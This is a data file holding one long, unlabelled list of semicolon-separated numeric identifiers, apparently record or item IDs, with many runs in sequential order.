141306;141128;141046;141026;141052;141057;141059;141049;143069;143085;141089;141123;141087;141088;141085;141086;141127;141305;141126;141124;141129;143070;141174;141175;141184;141196;141264;141265;141199;141197;141200;141201;141260;141307;141814;141453;141455;141454;141457;141456;141458;141582;141536;141628;141547;141540;141546;141577;141548;142034;141580;141606;141603;141581;141627;141774;142002;141812;141826;141811;141819;141816;141823;141818;141817;142004;141911;142003;142006;142009;142008;142007;142025;142030;142452;142029;142028;142430;142392;142400;142404;142429;142385;142396;142436;142440;142418;142378;143093;142426;143090;142432;142393;143071;142399;142389;142428;142448;142433;143076;142379;142380;142391;142376;142403;142384;142414;142441;142382;142398;142377;142387;142434;142413;142442;142381;142427;142431;142417;142401;142375;142407;142383;143083;142394;142435;142416;142449;142437;142402;142405;142446;142451;142445;143081;142439;142408;142412;142443;142397;142447;142444;143097;142410;142395;142390;142438;142386;142415;142388;142406;142409;142374;142450;142457;142459;142454;142453;142458;142455;142461;142463;142460;142471;142474;142475;142476;142477;142469;142470;142478;142480;142479;142643;142673;142674;142672;142675;142705;142704;142707;142699;142696;142906;142701;142708;142703;142709;142706;142700;142702;142697;142698;142710;142715;142716;142714;142871;142907;142863;142982;143240;142973;142864;142992;142994;143054;142972;143364;143160;143162;143164;143161;144199;143163;143213;143199;143198;143235;143200;143212;143203;143209;143205;143202;143208;143211;143204;143236;143237;143241;143239;143238;143279;143281;143280;143275;143369;143276;143365;143278;143370;143277;144200;143366;145070;143442;143469;143473;143472;143474;143605;143604;143606;144410;143603;143602;143601;143607;144553;144116;144114;144115;144113;144205;144202;144201;144204;144382;144203;144399;144273;144389;144420;144419;144276;144274;144281;144280;144414;144552;144404;144402;144275;144421;144384;144380;144551;144423;144400;144393;144392;144407;144415;144390;144418;144383;144385;144377;144379;144391;144409;144397;144422;144381;144406;144403;144378;144401;144412;144396;144388;144398;144376;144394;144408;144405;144509;144386;144387;144395;144417;144413;144411;144416;144604;146810;144605;144505;144506;144507;144510;144512;144511;144522;144557;144548;144556;144554;144558;144560;144555;144559;144550;144706;144705;144753;144754;144765;145089;144942;145049;144847;144846;144848;144845;155786;144850;144872;145229;144871;144936;144941;144937;144931;144935;144934;144939;144996;145088;145077;145082;145087;145079;145085;145083;145068;145042;145067;145044;145226;145043;145243;145227;145406;155781;145076;145074;145242;145493;145500;145494;145497;145498;145492;145495;145499;145496;145403;145536;145404;145408;145405;145407;145701;145443;145440;145503;145507;145506;145544;145545;145543;145541;145704;145787;145790;145786;145788;145789;146082;146076;146073;146072;146080;146075;146081;146079;146055;146071;146074;146093;146095;146210;146094;146566;147015;146316;146379;146382;146383;146380;146378;146381;146434;146432;146431;146492;146439;146493;146491;146541;146532;146545;146533;146537;146550;146551;146547;146536;146540;146535;146542;149503;146584;149504;149507;149506;147013;146793;146801;146803;146809;146813;146815;146812;146817;146811;146816;146822;146821;146820;146930;146929;146931;155780;146932;147011;147010;147014;147017;147018;147016;146955;146953;146951;146961;146960;146959;146954;146957;146956;146952;146950;147009;147707;147012;147023;147139;147143;147138;147140;147199;147201;147200;147142;147197;147198;147196;147194;147208;147214;147209;147211;147215;147207;147210;147212;147235;147232;147234;147365;147236;147233;147643;147706;147809;147805;147808;148117;147810;147806;147807;147828;147841;147827;147835;147836;147833;147831;147837;147838;147829;147830;147842;147826;147834;147832;147866;147868;147867;147881;147879;147882;147880;147886;148247;148224;148020;148018;148016;148019;148017;148032;148122;148118;148120;148119;148114;148116;148121;148113;148115;148215;148316;148490;148249;148893;148888;148890;148886;148887;148889;148257;148246;148256;148317;148319;148330;148331;148329;148333;148390;148328;148332;148368;148369;148394;148370;148379;148393;148397;148852;148460;148572;148540;148489;148542;148566;148543;148570;148562;148561;148564;148568;148569;148563;148567;148684;148685;148769;148770;148771;148768;148806;148808;148807;148857;148860;148851;148876;148877;148853;148892;148854;148858;148880;157845;148878;149063;148881;148879;148906;148943;148903;148942;148950;148945;148981;148985;148983;148984;148982;148989;148993;148988;148990;149258;149024;149028;149236;149235;149029;149027;149025;149060;149091;155782;149240;149243;149241;149242;149239;149318;149319;149321;149317;149441;149444;149445;149435;149443;149442;149876;149793;149978;149695;149677;149670;149653;149664;149698;149693;149705;149690;149657;149686;149680;149676;149692;149703;149697;149706;149712;149682;149678;149652;149694;149655;149683;149687;149660;149671;149662;149654;149679;149701;149691;149702;149710;149656;149669;149674;149658;149673;149688;149696;149659;149663;149684;149672;149700;149709;149675;149689;149708;149713;149667;149665;149714;149681;149666;149707;149668;149685;149711;149720;149792;149726;149721;149760;149725;149735;149723;149724;149813;149722;149841;149811;149980;149816;149817;149815;149835;149840;149839;149898;149904;149997;149998;150075;150433;150117;150296;150118;150295;150289;150290;150125;150701;150123;150700;150124;150136;150135;150127;150126;150128;150149;150148;150146;150147;150294;150161;150291;150786;150321;150323;150322;150785;150326;150347;150346;150375;150293;150350;155785;150829;150389;150392;150390;150393;150388;150808;150391;150810;150378;150379;150380;150376;150382;150381;150383;150377;150386;150387;150820;150818;150819;150421;150422;150432;150826;150825;150817;150812;150434;150827;150823;150813;150815;150816;150501;150759;150758;150757;150828;150824;150790;150795;150756;150792;150766;150776;150781;150822;150777;150814;155783;150780;150775;151290;152103;150844;150821;150845;150853;155784;150852;151117;151276;150951;151018;150963;150991;150950;151116;151115;151426;151140;151142;151149;151138;151135;151136;151143;151141;151139;151153;151289;151137;151427;151428;151445;151454;151453;151446;151493;151580;151579;151578;151846;151864;151871;151855;151856;151857;151872;151854;151862;151850;151845;151888;151886;151863;151889;151887;151867;151843;151858;151842;151859;155787;152003;151929;151670;151671;151668;151669;151675;151811;152080;151914;151913;151910;151908;151911;151912;151909;151852;151844;151861;151848;151849;151865;151927;152005;152001;152074;152077;152076;152097;152132;152133;152440;152352;152355;152348;152347;152350;152585;152346;152351;152354;152353;152447;152444;152438;152740;152445;152449;152443;152451;152439;152448;152450;152442;152446;152595;152605;152590;152441;152584;152592;152604;152586;152593;152606;152581;152600;152577;152603;152579;152589;152602;152580;152599;152613;152627;152620;152621;152619;152832;152660;152678;152661;152689;152968;152688;152975;152874;152778;152781;152779;152829;152828;152862;152863;152902;152903;152906;152905;152908;152904;152932;152926;152934;152964;152965;152955;152923;152935;152924;152922;152939;152930;152938;152937;152933;152925;152931;152929;152972;152977;152940;153098;153099;153102;153095;153096;153101;153103;153097;153094;153100;153104;153233;153231;153228;153232;153234;153235;153238;153229;153230;153242;153371;153370;153404;153403;153405;153513;153523;153518;153525;153517;153524;153522;153834;153552;153553;153833;153835;153832;153764;153777;153803;153804;153776;153887;153873;153902;153886;153940;154019;154022;154023;154024;154018;154086;154072;154071;154084;154076;154077;154046;154075;154074;154083;154047;154048;154070;154078;154049;154080;154293;154081;154082;154136;154135;154134;154143;154168;154169;154170;154313;154324;154294;154310;154307;154311;154309;154320;154260;154252;154261;154254;154737;154251;154255;154669;154667;154333;154335;154295;154306;154312;154334;154419;154421;154420;154437;154668;154670;154666;154784;154832;154938;154830;154856;154855;154781;154831;154841;154838;154834;154846;154847;154843;154836;154840;154842;154893;154854;154887;154849;155292;154910;154891;154909;154944;154947;154943;155132;154942;155105;155058;155172;155178;155197;155151;155168;155090;155201;155200;155194;155193;155085;155094;155217;155169;155210;155073;155152;155091;155181;155110;155144;155224;155159;155080;155089;155112;155190;155167;155086;155165;155160;155079;155209;155216;155207;155171;155111;155072;155212;155092;155059;155219;155100;155155;155126;155093;155133;155153;155122;155208;155170;155150;155225;155101;155211;155103;155185;155071;155146;155214;155179;155184;155106;155114;155082;155087;155203;155192;155202;155206;155107;155096;155088;155148;155164;155204;155113;155102;155081;155218;155158;155104;155182;155183;155108;155215;155149;155115;155109;155022;155021;155074;155023;155223;155332;155075;155335;155336;155333;155334;155612;155361;155364;155368;155366;155360;155359;155367;155371;155386;155365;155384;155376;155385;155378;155377;155544;155542;155614;155599;155618;155613;155654;155689;155684;155691;155690;155686;155685;155682;155688;155831;155765;155858;155755;155718;155728;155720;155719;155725;155743;155736;155756;155741;155746;155745;155762;155763;155764;155832;155833;155835;155830;155820;155941;155937;155891;155890;155868;155940;155927;155928;155931;155955;155968;155954;155956;155951;155971;155950;155977;155985;155988;155974;155983;155976;155995;156005;156003;156004;156037;156038;156044;155966;156109;156106;156111;156107;156108;156129;156127;156126;156134;156133;156201;156202;156225;156128;156250;156246;156247;156249;156248;156261;156452;156454;156453;156251;156465;156463;156716;156464;156548;156659;156726;156658;158870;156632;156656;156655;156657;156730;156653;156660;156905;156734;156729;156696;156728;156727;156735;156731;156739;156738;156737;156733;156736;156774;156792;156788;156793;156819;156873;156798;156874;156866;156865;157053;156878;156869;156872;156909;156913;157044;157046;156912;157049;157045;157056;157052;157054;157051;157100;157089;157097;157099;157111;157135;157133;157132;157071;157095;157091;157134;157106;157904;157136;157163;157166;157168;157226;157167;157183;157165;157264;157267;157268;157265;157270;157269;157296;157285;157309;157295;157311;157880;157312;157313;157314;157337;157363;157336;157384;157366;157362;157364;157376;157374;157375;157411;157412;157417;157414;157418;157331;157455;157420;157415;157451;157465;157466;157454;157854;158119;158096;157874;157875;157861;157873;158066;158056;158047;158048;158055;158057;158071;158075;158074;158082;158080;158093;158077;158070;158078;158076;158132;158120;158129;158116;158115;158106;158356;158368;158326;158216;158215;158260;158248;158263;158266;158261;158264;158262;158323;158321;158322;158324;158325;158341;158327;158347;158334;158349;158360;158351;158333;158355;158464;158354;158504;158505;158556;158565;158555;158735;158727;158736;158674;158741;158993;158745;158811;158814;158812;158808;158803;158807;158813;158804;158805;158873;158822;158802;158806;158810;158895;158816;158809;158815;158924;158906;158913;158918;158912;158907;158923;158914;159114;159168;159165;158948;158950;158942;158952;158947;158949;158951;159122;158943;159030;159000;159041;159119;159118;159108;159120;159121;159169;159167;138374;90250;139374;12512;59189;149983;105412;14657;33927;117484;109322;109323;109324;109325;109326;100635;111108;100634;33126;125835;152610;55800;11673;45138;45139;10202;21677;28376;42799;86420;70290;70291;46693;21606;25241;11048;11930;10656;21607;33273;52973;39807;39808;159166;39809;20996;33561;21327;20995;33562;31422;12042;76254;76253;10203;10392;10204;32032;11006;21141;76252;18560;18559;34030;77089;50577;16462;39588;39589;11822;11829;39587;14222;14180;77684;107005;10205;10161;22363;22227;10627;77683;54602;54603;66317;58171;70352;103221;95950;148695;150716;155127;66315;66316;33476;41947;35737;41946;12082;59607;90712;51461;51463;51462;10421;157830;157809;157789;157816;157744;157782;157734;157793;157742;157760;157768;157732;157731;157800;157769;157747;157749;157836;157774;157827;157835;157799;157767;157811;157733;157779;157772;157803;157825;157797;157834;157771;157748;157806;157798;157762;157763;157764;157804;157817;157754;157794;157785;157838;157759;157745;157792;157750;157808;157776;157766;157784;157781;157821;157752;157743;157775;157765;157756;157730;157795;157818;157758;157773;157810;157812;157755;157802;157746;157829;157783;157788;157791;157828;157839;157741;157751;157824;157777;157757;157837;157826;157740;157814;157736;157787;157820;157801;157761;157815;157813;157823;157737;157735;157739;157831;157770;157805;157833;157822;157796;157832;157819;157738;157807;157753;157780;157790;157778;157844;157786;157863;157864;158842;158877;158867;158868;158876;46337;71174;40334;28333;158965;11684;35273;10206;10207;10479;70144;10208;70143;10210;11418;10214;10215;103532;10223;54586;53335;20759;10226;10227;11841;10239;11420;11111;69428;10340;105413;108888;70745;70746;108889;69427;18213;62438;69514;69515;55507;57347;105414;57348;57349;55508;55509;50830;10245;10096;49689;10380;11390;11943;11389;14223;12230;78428;87818;52455;61434;63065;76939;68996;83140;43005;43004;43006;83141;33860;99476;31097;50000;10762;64298;19504;17987;20880;29868;25169;99477;29867;29853;20986;28291;21676;11058;10950;10790;26062;10804;31993;33226;35687;34772;38745;39339;39767;42478;40554;45045;46838;47888;50654;49144;52613;53411;55639;56483;59069;58323;71616;31788;49999;12000;76710;136402;148112;142489;154852;146489;136423;158554;136355;148692;122056;24685;25217;136734;17719;28228;29253;32476;17720;17721;41970;122057;34993;47036;35298;55733;122058;46351;49228;52503;57752;58949;67118;63561;82580;74242;64459;65631;69276;122860;125388;128549;132023;136177;133210;142419;138223;156756;149699;149350;155620;70926;76973;80916;81485;157360;87768;71377;73080;74290;76202;87769;90098;90508;92466;99199;96142;104849;111974;100388;101773;103535;119306;108378;126307;126308;130629;130628;124087;124088;39502;15394;10786;14711;90509;15985;25240;58327;45047;45046;11398;14381;104887;24684;13657;17722;11113;25216;17723;58662;11442;44406;11168;76314;11523;15705;11131;18364;10246;11775;11493;24020;10417;10711;11585;10514;18650;10415;10416;11492;35951;12061;12073;16468;35952;65612;63686;12059;12087;44341;44342;44343;146444;147022;146273;146443;146272;62291;66807;56981;55650;40617;55651;72211;40618;72258;62292;62293;126003;19298;32194;22465;148399;148400;138506;139583;140504;147961;150694;150753;150417;147870;150787;150717;150719;152120;151762;149848;151808;150718;151663;152096;153441;156226;157848;156725;158042;155603;154141;148573;144081;145705;154919;154918;156326;157847;138499;93374;138762;72263;36073;145532;72262;29924;11929;36072;36163;31121;31122;67129;12219;84231;145445;84232;84233;84234;84235;84236;84237;24236;11173;11174;10633;84238;25734;69956;12001;19604;10453;19681;50431;50430;10454;18507;21230;46802;21313;34443;36019;70216;91345;91384;91385;81700;56993;73641;60084;85691;85543;85692;73642;73643;85411;85600;81788;89111;86899;103048;88839;117360;96875;96876;119845;124591;124329;126469;129292;73644;73645;56994;56995;117361;73646;58448;87208;52961;58450;81701;60083;23799;53572;72702;72556;82698;97327;53548;91625;89029;89030;89031;89032;83951;84262;88410;88411;88412;62964;70591;81248;23800;23801;23802;58796;72707;23803;90001;70415;53223;83522;65602;109145;109146;55630;63427;23804;64682;21725;23805;84498;95713;81298;146452;81789;81577;23806;23807;76573;59892;84586;59500;59501;59374;58449;53573;122186;26066;118576;111466;73567;82664;83467;91346;49694;83468;70559;72201;72703;70558;81049;80359;66405;66406;131704;129469;152098;62797;155947;130430;62795;62796;65195;131736;66805;65193;65194;130431;127139;72557;72558;86572;86573;120947;136182;134977;152099;77377;77376;91622;91623;122424;91624;70557;72486;76147;70556;111139;57598;24872;23808;118711;23809;23810;87124;87125;91626;87126;101930;62439;100462;100463;65656;80910;23811;23812;25147;23813;23814;24725;23815;23816;54291;23967;54645;59249;52962;64296;64297;137356;83952;104101;84263;85403;70760;88413;88414;88415;88416;53549;55025;55026;88417;59325;64630;72107;72108;73303;77964;51360;62965;87891;70592;59502;83917;83774;81553;59376;59375;59377;82665;70292;81249;59373;50303;59557;59556;59559;82076;59558;57599;72708;23817;83301;66761;23818;23819;97436;83302;23820;23821;23822;119147;23823;23824;23825;23826;23827;57600;52993;52995;52994;52992;91283;94328;91284;94329;23828;83187;23829;23830;90002;90003;58953;121006;58797;70416;141304;84566;84570;84567;84568;84569;90599;90600;53543;125312;83523;110534;117671;135696;145268;119265;73516;123010;59528;64487;70351;58991;73517;59527;62566;53877;65603;53878;70921;109143;81107;106228;109280;109144;106229;57601;63429;152531;63428;63430;139606;112123;112124;83263;64683;70530;83264;81376;97666;70531;97667;84499;85842;81591;131775;81592;81593;99168;95714;131401;131402;146453;81545;133216;95715;82853;100299;102991;95716;81578;81299;127057;112162;125392;57602;76574;58451;76575;67142;67143;67144;84587;103533;103534;72620;55631;47759;62032;61494;61493;82269;77375;77374;19506;108714;69869;73636;57030;57029;58186;149972;155316;149971;71807;159008;11502;90940;74365;74367;74149;76279;76280;87539;87507;90708;86610;93383;101840;94679;103925;106197;118229;74366;105654;74379;87601;119811;44674;74148;11561;65046;61648;61597;58993;58992;61598;61649;10720;144104;20863;21226;21629;22097;22371;23634;23928;24735;144105;25351;33394;33506;34269;34768;35220;36130;35978;39494;40874;45111;25765;25842;28374;27536;30210;31653;42307;50386;43175;51124;52769;52533;53597;44660;45395;47785;47126;49149;50088;57317;59411;60046;62583;61718;62592;62747;63001;64726;63554;65187;65809;55884;69996;69272;70950;70719;55885;71349;56041;56123;57353;56337;57921;57772;58009;58352;58901;72333;73771;73101;77909;77283;82042;80525;15820;138818;15822;18533;138213;18534;66545;38687;147896;85183;146621;144584;146962;152986;148404;154240;152985;151985;156557;89963;90429;92558;97726;96832;97575;104361;111795;117672;119149;101044;85628;71157;80303;85565;88809;101045;101046;104639;106563;147144;71158;148280;153589;85566;89027;93343;91814;101047;101048;101049;101050;103121;104640;71461;33104;25994;23785;28375;10637;22922;142462;141575;133964;19748;11347;17724;43637;141576;74289;10809;11499;11086;11346;10247;11088;10248;11232;11350;10249;11349;11316;10278;10729;11348;11351;111549;10588;10055;11352;11838;11087;11364;10250;38877;10614;17326;121041;50625;18298;100789;18155;23752;60097;18054;18055;15543;14842;18600;15914;26921;25672;10958;10959;10960;48435;50659;69060;71863;72658;76369;146308;151646;156886;33937;34398;35328;41980;36035;43369;42934;48434;45140;92440;11362;72664;59862;19334;22495;72663;11954;11955;11021;10350;10967;11654;11846;38157;47579;47580;57027;57028;11535;10252;78701;57026;77969;78822;77970;88907;88908;107267;50600;10500;11583;20975;107268;39564;40421;42369;44094;46329;48436;50387;51936;55833;55142;56734;57941;59047;61536;62702;64621;65913;67233;69844;71342;72435;72983;84765;85882;86633;97835;100806;104628;124028;26065;12064;11942;11719;16064;11624;31098;10717;10437;18249;12038;11720;25935;152522;151666;145549;150863;149326;150140;152659;80169;66839;66840;145491;90201;51894;51895;15403;90202;72885;77856;77855;77830;42399;58134;77831;19398;10846;10847;44941;44331;44940;17328;44332;11469;14224;14713;22023;20303;25930;57634;57635;11035;10705;21224;15987;21642;110271;56983;22092;10253;31790;29835;22368;21787;55977;55978;55979;36018;17970;51119;18460;51118;11448;23969;16216;16171;22867;18670;16180;33928;45360;10725;22877;35327;18265;21576;30206;33125;45060;50597;45061;53845;50598;57877;66694;66695;101084;19772;42148;20090;21209;29250;101085;21208;60162;60163;60164;60165;60166;60167;60168;60169;60170;60171;60172;60173;60174;60175;60176;60177;60178;60179;60180;60182;60181;60183;60184;60186;60185;60187;60188;60189;60190;60191;60192;60193;60194;60195;60196;60197;60198;60199;60200;60201;60202;60203;60204;60205;60207;60206;60208;60209;60210;60212;60211;60213;60214;60215;60216;60217;60218;60219;60220;60221;60222;60223;60224;60225;60226;60227;60228;60229;60230;60231;60232;60233;60234;60235;60236;60237;60238;60239;60240;60241;60242;60243;60244;60246;60245;60248;60247;60249;60250;60251;60252;60254;60253;60255;60256;60258;60257;60259;60260;60261;60262;60264;60263;60265;60266;60267;60268;60269;60270;60271;60272;60273;60275;60274;60276;60277;60278;60279;60280;60281;60282;60283;60285;60284;60286;60287;60288;60289;60290;60291;60292;60293;60294;60295;60296;60297;60298;60299;60300;60301;60302;60304;60303;60305;60306;60307;60308;60309;60310;60311;60312;60313;60314;60315;60316;60317;60318;65042;60319;60320;60321;60322;60323;60325;60324;60326;60327;60328;60329;60331;60330;60332;60333;60334;60335;60336;60337;60338;60339;60340;60341;60342;60343;60344;60345;60346;60347;60348;60350;60349;60351;60352;60353;60354;60355;60356;60357;60358;60360;60359;60361;60362;60364;60363;60365;60366;60368;60367;60369;60370;60371;60372;60373;60374;60375;60376;60377;60378;60379;60381;60380;60383;60382;60385;60384;60386;60387;60388;60389;60390;60391;60392;60393;60394;60395;60396;60397;60398;60399;60400;60401;60402;60403;60404;60405;60406;60407;60408;60409;60410;60411;60412;60413;60414;60415;60416;60417;60418;60419;60421;60420;60422;60423;60424;60425;60427;60426;60428;60429;60430;60431;60432;60433;60434;60435;60436;60437;60438;60439;60440;60441;60442;60443;60444;60445;60446;60447;60448;60449;60450;60451;60453;60452;60454;60455;60456;60457;60458;60460;60459;60461;60462;60463;60464;60466;60465;60467;60468;60469;60470;60471;60472;60473;60474;60475;60476;60477;60478;60480;60479;60481;60482;60483;60484;60486;60485;60487;60488;60489;60490;60491;60492;60493;60494;60495;60496;60497;60498;60499;60500;60501;60502;60503;60504;60505;60506;60507;60509;60508;60510;60511;60512;60513;60514;60515;60516;60517;60518;60519;60520;60521;60522;60523;60524;60525;60526;60527;60528;60529;60530;60531;60532;60533;60535;60534;60536;60537;60539;60538;60540;60541;60542;60543;60544;60545;60546;60547;60548;60549;60550;60552;60551;60553;60554;60555;60556;60557;60558;60559;60560;60561;60562;60563;60564;60565;60566;60567;60568;60569;60571;60570;60572;60573;60574;60575;60576;60578;60577;60579;60580;60581;60583;60582;60584;60585;60586;60587;60588;60590;60589;60591;60592;60593;60595;60594;60596;60597;60598;60600;60599;60601;60602;60603;60604;60605;60606;60607;60608;60609;60610;60611;60612;60613;60614;60615;60616;60617;62808;62809;60618;60619;60620;60621;60623;60622;60624;60625;60626;60627;60628;60629;60630;60632;60631;60633;60634;60635;60637;60636;60638;60639;65043;60640;60641;60642;60644;60643;60645;60646;60647;60649;60648;60650;60651;60652;60653;60654;60655;60656;60657;60658;60660;60659;60661;60662;60663;60664;60665;60666;60667;60668;60669;60670;60671;60673;60672;60674;60675;60676;60677;60678;60679;60680;60681;60682;60683;60684;60685;60687;60686;60689;60688;60690;65044;60692;60691;60693;60694;60695;60696;60697;60698;60699;60700;60701;60702;60703;60704;60705;60706;60707;60708;60709;60710;60711;60712;60713;60715;60714;60716;60718;60717;60719;60720;60721;60722;60724;60723;60725;60727;60726;60728;60729;60730;60731;60732;60733;60734;60735;60736;60737;60738;60739;60740;60741;60743;60742;60744;60745;60746;60747;60748;60749;60750;60752;60751;60753;60754;60755;60756;60757;60758;60759;60760;60761;60763;60762;60764;60765;60766;60767;60768;60769;60770;60772;60771;60773;60774;60775;60776;60777;60779;60778;60780;60781;60782;60784;60783;60785;60786;60787;60788;60789;60790;60791;60793;60792;60794;60795;60796;60797;60798;60799;60800;60801;60802;60804;60803;60805;60806;60807;60808;60809;60811;60810;60812;60813;60814;60816;60815;60817;60818;60819;60820;60821;60822;60823;60824;60825;60826;60827;60828;60829;60830;60831;60832;60833;60834;60836;60837;60838;60839;60835;60840;60841;60842;60843;60844;60845;60846;60847;60848;60849;60850;60851;60852;60853;60854;60855;60856;60857;60858;60859;60860;60861;60862;60863;60864;60866;60865;60867;60868;60869;60870;60871;60872;60873;60874;60875;60876;60877;60878;60880;60879;60881;60882;60883;60884;60885;60886;60887;60888;60889;60890;60891;60892;60893;60894;60895;60896;60897;60898;60899;60901;60900;60902;60903;60904;60905;60906;60907;60909;60908;60910;60911;60913;60912;60915;60914;60917;60916;60918;60919;60920;60921;60922;60923;60924;60925;60927;60926;60929;60928;60930;60931;60932;60933;60934;60936;60935;60937;60939;60938;60941;60940;60942;60943;60944;60945;60946;60947;60948;60949;60950;60952;60951;60953;60954;60955;60956;60957;60958;60959;60960;60961;60962;60963;60964;60965;60966;60967;60968;60969;60970;60971;60972;60973;60974;60976;60975;60977;60978;60979;60980;60981;60982;60983;60984;60985;60986;60987;60988;60989;60990;60991;60992;60993;60994;60995;60996;60997;60998;60999;61000;61001;61002;61003;61004;61005;61006;61007;61009;61008;61011;61010;61013;61012;61014;61015;61017;61016;61019;61018;61020;61021;61022;61023;61024;61025;61026;61027;61028;61029;61030;61031;61032;61034;61033;61036;61035;61037;61038;61039;61040;61041;61042;61043;61044;61046;61045;61047;61048;61049;61050;61051;61052;61053;61054;61055;61056;61057;61058;61059;61060;61061;61062;61063;61064;61065;61066;61067;61068;61069;61070;61071;61072;61073;61074;61075;61076;61077;61078;61079;61080;61081;61082;61083;61085;61084;61087;61086;61089;61088;61091;61090;61093;61092;61094;61095;61096;61097;61098;61099;61100;61101;61102;61103;61104;61105;61106;61107;61108;61109;61110;61111;61112;61113;61114;61115;61116;61117;61118;61119;61120;61121;61122;61123;61124;61125;61126;61127;61128;61129;61130;61131;61132;61133;61134;61135;61136;61137;61138;61139;61140;61141;61142;61144;61143;61145;61146;61147;61148;61149;61150;61151;61152;61153;61154;61155;61157;61156;61159;61158;61160;61161;61162;61163;61164;61165;61166;61167;61168;61169;61170;61171;61172;61174;61173;61176;61175;61177;61178;61180;61179;61181;61182;61183;61184;61185;61186;61187;61188;61189;61190;61191;61193;61192;61194;61195;61196;61197;61198;61199;61200;61201;61202;61203;61204;61205;61206;61207;61208;61209;61211;61210;61212;61213;61214;61215;61216;61217;61218;61219;61220;61221;61222;61223;61225;61224;61226;61227;61228;61229;61230;61231;61233;61232;61234;61235;61237;61236;61238;61239;61240;61242;61241;61243;61244;61245;61246;61247;61249;61248;61251;61250;61252;61253;61254;61255;61256;61257;61258;61259;61260;61262;61261;61263;61264;61265;61267;61266;61268;61269;61270;61271;61272;61273;61275;61274;61276;61277;61278;61279;61280;61281;61282;61283;61284;61285;61286;61287;61288;61289;61290;61291;61292;61293;61294;61295;61296;61297;61298;61299;61300;61302;61301;61303;61304;61305;61306;61307;61308;61309;61310;61311;61312;61313;61314;61315;61317;61316;61318;61319;61320;61321;61322;61323;61324;61325;61327;61326;61328;61329;61331;61332;61330;61333;61334;61335;61336;61337;61338;61339;61340;61342;61341;61343;61344;61345;61346;61347;61349;61348;61350;61352;61351;61353;61354;61355;61357;61356;61358;83916;61359;61361;61360;61362;61363;61364;61366;61365;61367;61368;61369;61371;61370;61372;61407;61406;61408;61409;61410;61427;61426;61428;61455;61456;61605;61560;61606;61655;61656;61692;61657;61693;61694;61726;61784;61727;61785;62071;61786;61794;61796;61795;62057;62059;62058;62094;62095;62106;62108;62107;62109;62171;62172;62174;62173;62175;62197;62218;62346;62304;62427;62426;62428;62432;62492;62493;62506;62555;62554;62556;62616;62617;62653;62618;62773;62774;62775;62859;62858;62898;62918;62924;62933;62919;62934;63018;63019;63071;63020;63106;63191;63183;63192;63314;63313;63294;63591;63601;63592;63471;63593;63595;63594;63596;63597;63598;63600;63599;63602;63603;63604;63605;63472;63606;63607;63664;63677;63678;64090;64091;63679;64282;64423;64424;64425;64426;64427;64428;64429;64489;64605;64499;64521;64522;64523;64566;64776;64777;64778;64779;64946;65563;64947;64948;65008;64950;64949;65010;65009;64951;65011;64952;65012;64953;64954;65013;64955;64956;64957;64958;65014;64959;65015;64960;65016;65017;64962;64961;64964;64963;65018;65019;65020;65021;65022;65086;65076;65087;65089;65088;65090;65091;65092;65093;65094;65239;65174;65240;65241;65242;65243;65244;65564;65565;65606;65627;65653;65654;65679;65716;65715;65761;65762;65782;65783;65864;65906;65957;65977;65993;66016;66017;66018;66214;66019;66226;66227;66228;66229;66371;66441;66460;66461;66462;66490;66491;66551;66663;66664;66665;66708;66709;66778;66779;66780;66774;66884;66891;66885;66950;66951;66952;66982;66983;66984;67185;67220;68867;67241;68868;68945;68946;69013;69068;69163;69164;69165;69166;69167;69257;69223;69279;69258;69342;69440;69503;69504;69786;69796;69945;69946;70014;70016;70015;70017;70115;70188;70467;70388;70389;70390;70392;70391;70365;70364;70393;70394;70490;70468;70491;70537;70576;70577;70578;70603;70604;70605;70704;70705;70707;70706;70708;70756;70757;70772;71191;71294;71192;71295;71296;71297;71298;71193;71490;71194;71195;71196;71197;71198;71199;71299;71200;71201;71300;71302;71301;71202;71303;71304;71305;71306;71338;71339;71340;71341;71371;71372;71373;71391;71491;71424;71517;71641;71629;71630;71631;71632;71894;71893;71910;71988;71989;72083;72084;72162;72197;72210;72275;72276;72322;72323;72365;72421;72475;72476;72477;72500;72501;72569;72570;72680;72738;72699;72739;72795;72796;72811;72855;72924;73013;73012;73014;73073;73074;73114;73115;73116;73176;73177;73200;73201;73285;73286;73296;73368;73369;73408;73453;73454;73588;73589;73590;73664;73679;73706;73797;73798;73938;73907;74103;74172;74208;74209;74305;74306;74307;74308;74349;74487;74350;74488;74489;74490;74492;74491;76197;76157;76245;76246;76448;76449;76450;76551;76552;76681;76752;76701;76702;76703;76753;76782;76783;77017;77018;77047;77084;77144;77215;77272;77216;77465;77551;77552;77553;77554;77598;77629;77700;77954;78416;78417;78418;77955;77865;77956;77957;77981;78419;78460;78841;78842;78844;78843;78845;78846;78847;78641;78642;78848;78643;78644;78849;78645;78646;78850;78536;78537;78622;78647;78648;78649;78851;78852;78853;78854;78855;81294;79082;79081;79229;79230;79231;79304;79305;79330;79381;79331;79427;79657;79658;79712;79713;79714;79715;79759;80014;80015;80016;80017;80018;80019;80020;80099;80075;80100;80162;80117;80163;80164;80397;80545;80409;80546;80902;80903;80904;80933;80905;81037;81015;81038;81072;81074;81073;81160;81308;81310;81309;81477;81476;81478;81479;81540;81541;81751;82248;82249;82250;82251;82252;82253;82254;82255;82256;82257;82258;82259;82260;82261;81770;81809;82262;82263;82264;82265;82266;82293;82294;82468;82469;82520;82521;82522;82638;82694;82759;82760;82813;82814;82815;82816;82987;82988;82989;83029;83174;83450;83451;83453;83452;83454;83455;83456;83457;83458;83459;83460;83538;83969;84015;84078;84113;84114;84144;84226;84259;84536;84393;84537;84394;84538;84539;84540;84541;84542;84543;84611;84661;84790;84791;84792;84894;84895;85189;84793;85190;85191;85192;85193;85194;85195;85196;85197;85198;85199;85200;85201;85202;85203;85204;85205;85206;85207;85208;85209;85210;85004;85071;85072;85119;85120;85211;85150;85264;85296;85212;85343;85397;85498;85499;85500;85501;85502;85503;85564;85620;85621;85622;85623;85646;85759;85706;85785;85760;85787;85786;85788;85789;85866;85790;85867;85960;85961;86100;86202;86101;86243;86363;86364;86489;86527;86528;86671;86529;86563;86564;86615;86626;86748;86747;86749;86750;86751;86846;86894;86938;86939;87548;87549;87550;87551;87552;87553;87554;87555;87556;87638;87557;87558;87559;87560;87561;87562;87563;87564;87565;87566;87567;87568;87569;86992;87570;87572;87571;87573;87574;87575;87576;87577;87578;87579;87580;87062;87103;87120;87121;87235;87581;87582;87584;87583;87308;87585;87401;87400;87402;87586;87459;87403;87460;87491;87492;87587;87639;87773;87838;87839;87840;87841;87813;87842;87843;87844;87938;88000;88037;88078;88079;88080;88174;88175;88407;88450;88451;88452;88483;88484;88676;88796;88795;88797;88798;88800;88799;88801;88860;89074;89075;89098;89099;89822;89823;89824;89825;89863;89864;89957;89958;89959;89987;89988;90020;90080;90081;90142;